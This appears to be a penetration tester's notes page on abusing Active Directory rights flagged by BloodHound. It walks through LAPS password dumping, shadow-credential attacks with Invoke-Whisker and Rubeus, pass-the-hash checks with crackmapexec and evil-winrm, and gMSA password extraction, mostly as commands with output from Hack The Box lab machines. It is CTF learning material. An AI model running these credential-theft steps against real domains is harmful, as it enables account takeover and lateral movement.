BloodHound Vector Attacks
Post

BloodHound Vector Attacks

ReadLAPSPassword

We can use the utility laps.py to read LAPS passwords outside the machine, all we need is valid credentials:

1
2
3
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
LAPS Dumper - Running at 07-07-2022 13:57:05
DC &V@%DQ-wEwQ97A

Examples: Timelapse [[StreamIO#^2cc182]]

Also another technique is with Get-LAPSPasswords.ps1 which can be abused within the machine:

1

Examples: Timelapse

We can use Invoke-Whisker.ps1 to abuse this privilege, first we need to execute the following command after upload it to the victim machine. This will retrieve a huge command that can be used with Rubeus.exe:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Windows\Temp\Recon> Invoke-Whisker -Command "add /target:sflowers"
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password lAfNxND7rgF9A5mJ
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 86d8f569-2258-4ab5-8ce1-0c8befa21b55
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers 
/certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhY...
vXgICB9A= /password:"lAfNxND7rgF9A5mJ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

But first we need to delete the carrier return and jump line of every line on it, so we can use “tr” and “sponge” commands after saving the output on a file called data:

1
cat data | tr -d '\n' | sponge data

Finally we need to upload the Rubeus.exe with curl and execute it as indicated by Invoke-Whisker:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

 ______        _
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
...
  ServiceName              :  krbtgt/outdated.htb
  ServiceRealm             :  OUTDATED.HTB
  UserName                 :  sflowers
  UserRealm                :  OUTDATED.HTB
  StartTime                :  1/25/2023 7:28:01 AM
  EndTime                  :  1/25/2023 5:28:01 PM
  RenewTill                :  2/1/2023 7:28:01 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  8hh6He6G6F2lLiBgwgmo3w==
  ASREP (key)              :  EB63CD6F931B4E922AC0EC5439D0C716

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5

This will retrieve the NTLM hash of the user sflowers, which then can be checked with crackmapexec:

1
2
3
4
crackmapexec winrm 10.10.11.175 -u 'sflowers' -H '1FCDB1F6015DCB318CC77BB2BDA14DB5' 
SMB         10.10.11.175    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:outdated.htb)
HTTP        10.10.11.175    5985   DC               [*] http://10.10.11.175:5985/wsman
WINRM       10.10.11.175    5985   DC               [+] outdated.htb\sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5 (Pwn3d!)

The [+] and the (Pwned!) indicates that it is possible to login via winrm so let’s do it:

1
2
3
evil-winrm -i 10.10.11.175 -u 'sflowers' -H '1FCDB1F6015DCB318CC77BB2BDA14DB5'         

*Evil-WinRM* PS C:\Users\sflowers\Documents>

Examples: Outdated

ReadGMSAPassword

After searching about how to execute a ReadGMSAPassword from our user, an excellent technique to obtain the GMSA password is abusing of gMSADumper.py as follows:

1
2
3
4
5
6
7
/usr/share/privesc/Windows/gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::fca9edf1c9fb8f031dfc38d918279642
svc_int$:aes256-cts-hmac-sha1-96:15516a903b67ce2aacda697b76fae9c2d1fc60e3408abc6587b2faeefb6bfac2
svc_int$:aes128-cts-hmac-sha1-96:4e25dcda503a43e8757abe3081892114

Search